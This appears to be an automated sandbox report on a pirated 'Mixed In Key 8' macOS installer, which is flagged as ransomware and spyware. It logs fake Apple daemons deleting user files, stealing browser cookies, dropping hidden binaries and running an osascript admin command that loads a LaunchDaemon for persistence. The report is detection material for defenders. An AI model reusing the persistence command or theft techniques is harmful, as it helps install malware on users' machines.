              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Public/.com.apple.timemachine.supported
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/resources/.metadata_never_index
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/private/.metadata_never_index
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.photoanalysisd/VisionService/AlgoFaceClusterCache.data
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/mediaanalysis.db
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/mediaanalysis.db-wal
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Pictures/Photos Library.photoslibrary/private/com.apple.mediaanalysisd/MediaAnalysis/mediaanalysis.db-shm
              Source: /Library/AppQuest/com.apple.questd (PID: 768)User file deleted: /Users/ben/Desktop/Nt7gLoFlYn.dmg
              Source: classification engineClassification label: mal100.rans.spyw.expl.evad.macDMG@0/1306@2/0
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_MIKNewsServiceClient
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_MIKWebServiceClient
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _IOMasterPort
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _AUGraphConnectNodeInput
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_MIKCrashReport
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: __swift_stdlib_reportUnimplementedInitializer
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_MIKGoogleAnalyticsClient
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _MIKTagErrorDomain
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _NSCocoaErrorDomain
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_NSURLConnection
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_METACLASS_$_MIKWebServiceClient
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _NSSearchPathForDirectoriesInDomains
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _objc_msgSend
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _objc_msgSendSuper2
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _objc_msgSendSuper2_stret
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _objc_msgSend_stret
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _kIOMasterPortDefault
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _mach_port_deallocate
              Source: extracted file from submission .\Utils\patchMach-O symbol: _ei_forensic_sendfile
              Source: extracted file from submission .\Utils\patchMach-O symbol: _set_important_files
              Source: extracted file from submission .\Utils\patchMach-O symbol: _http_request_f
              Source: extracted file from submission .\Utils\patchMach-O symbol: _http_request
              Source: extracted file from submission .\Utils\patchMach-O symbol: __react_ping
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: __T0SC6CGRectV6AppKitE5framey12CoreGraphics7CGFloatV9withWidth_SC22NSCompositingOperationO5usingtF
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: __T0SC6CGRectV6AppKitE4fillySC22NSCompositingOperationO5using_tF
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_NSBlockOperation
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_METACLASS_$_NSOperation
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: __swift_stdlib_operatingSystemVersion
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _NSFrameRectWithWidthUsingOperation
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _NSRectFillUsingOperation
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_NSOperationQueue
              Source: extracted file from submission .\Mixed In Key 8.app\Contents\MacOS\Mixed In Key 8Mach-O symbol: _OBJC_CLASS_$_NSOperation
              Source: initial sampleMach-O header: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
              Source: submissionMach-O header: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

              Persistence and Installation Behavior:

              barindex
              Executes shell scripts with administrative rightsShow sources
              Source: /bin/sh (PID: 763)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 769)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 773)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 777)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 797)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 801)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 806)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 822)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 835)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 781)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 785)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 789)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 793)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 805)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 813)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 831)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 851)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 855)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 859)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 863)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Source: /bin/sh (PID: 867)Osascript admin shell script: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
              Executes the "sudo" command used to execute a command as another userShow sources
              Source: /usr/libexec/xpcproxy (PID: 766)Sudo executable: /usr/bin/sudo -> sudo /Library/AppQuest/com.apple.questd --silent
              Reads local browser cookiesShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)Binary cookie file read: /Users/ben/Library/Cookies/Cookies.binarycookiesJump to behavior
              Source: /Library/mixednkey/toolroomd (PID: 756)Binary cookie file read: /Users/ben/Library/Cookies/Cookies.binarycookiesJump to behavior
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Binary cookie file read: /Users/ben/Library/Cookies/Cookies.binarycookies
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Binary cookie file read: /Users/ben/Library/Cookies/Cookies.binarycookies
              Writes Mach-O files to untypical directoriesShow sources
              Source: /Library/mixednkey/toolroomd (PID: 756)64-bit Mach-O written to unusual path: /Users/ben/Library/.O6a3uE2h3
              Source: /Library/mixednkey/toolroomd (PID: 756)64-bit Mach-O written to unusual path: /Users/ben/Library/AppQuest/com.apple.questd
              Source: /Library/AppQuest/com.apple.questd (PID: 768)64-bit Mach-O written to unusual path: /Users/ben/Library/.O6a3uE2h3Jump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)64-bit Mach-O written to unusual path: /Users/ben/Library/AppQuest/com.apple.questdJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)Permissions modified for written 64-bit Mach-O /Users/ben/Library/.O6a3uE2h3: bits: - usr: rx grp: rx all: rwx
              Source: /Library/mixednkey/toolroomd (PID: 756)Permissions modified for written 64-bit Mach-O /Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwxJump to dropped file
              Source: /Library/mixednkey/toolroomd (PID: 756)Permissions modified for written 64-bit Mach-O /Users/ben/Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwx
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Permissions modified for written 64-bit Mach-O /Users/ben/Library/.O6a3uE2h3: bits: - usr: rx grp: rx all: rwxJump to dropped file
              Source: /Library/AppQuest/com.apple.questd (PID: 768)Permissions modified for written 64-bit Mach-O /Users/ben/Library/AppQuest/com.apple.questd: bits: - usr: rx grp: rx all: rwxJump to dropped file
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/.BC.T_W2qavB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_0YLrar -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Bundle Info.plist File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/.BC.T_Kt2uij -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Bundle code signature resource File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/_CodeSignature/.BC.T_3yGq3E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Bundle code signature resource File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/.BC.T_xiSlDN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.sandbox/.dat.nosync02df.uhpiJs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.sandbox/.SessionUUIDJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A//Scripts/.BC.T_Pf7TBJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A//Scripts/._postinstall__Jump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A//.BC.T_q7lZI7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Scripts/com.mixedinkey.installer.YPgB1A//._postinstall__Jump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/.BC.D_RawtPN -> Versions/Current/MIKToolkitJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/.BC.D_00PyhC -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/.BC.D_rcerWH -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_tjd4Mq -> Versions/Current/PrivateHeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_o8agja -> Versions/Current/MIKMIDIJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_KhSS6n -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/.BC.D_TQFDqR -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_QI4FtD -> Versions/Current/HeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/.BC.D_5xRyZY -> Versions/Current/ModulesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_ainEXP -> Versions/Current/MIKAnalysisJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_RleRou -> Versions/Current/PrivateHeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_3ix0uz -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/.BC.D_F3xxHs -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/.BC.D_uiKIaB -> Versions/Current/HeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_7uXQP1 -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/.BC.D_8RpZhN -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.D_R695xQ -> fr.lprojJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.D_lHDyMR -> pt_BR.lprojJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/.BC.D_kl8xyw -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/.BC.D_2zlJqY -> Versions/Current/SparkleJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/.BC.D_dsTL15 -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_zOL9zi -> Versions/Current/XPCServicesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/.BC.D_kc6Hmg -> Versions/Current/MIKUpdateJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_fyXdim -> Versions/Current/ResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/.BC.D_QwOncX -> AJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_TDQ83x -> Versions/Current/HeadersJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_yZRuzT -> Versions/Current/MIKDataJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/.BC.D_evnWbv -> Versions/Current/ModulesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_mcLu6S -> Versions/Current/MIKTagJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Hidden Symbolic link created: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/.BC.D_z1kKkx -> Versions/Current/ResourcesJump to behavior
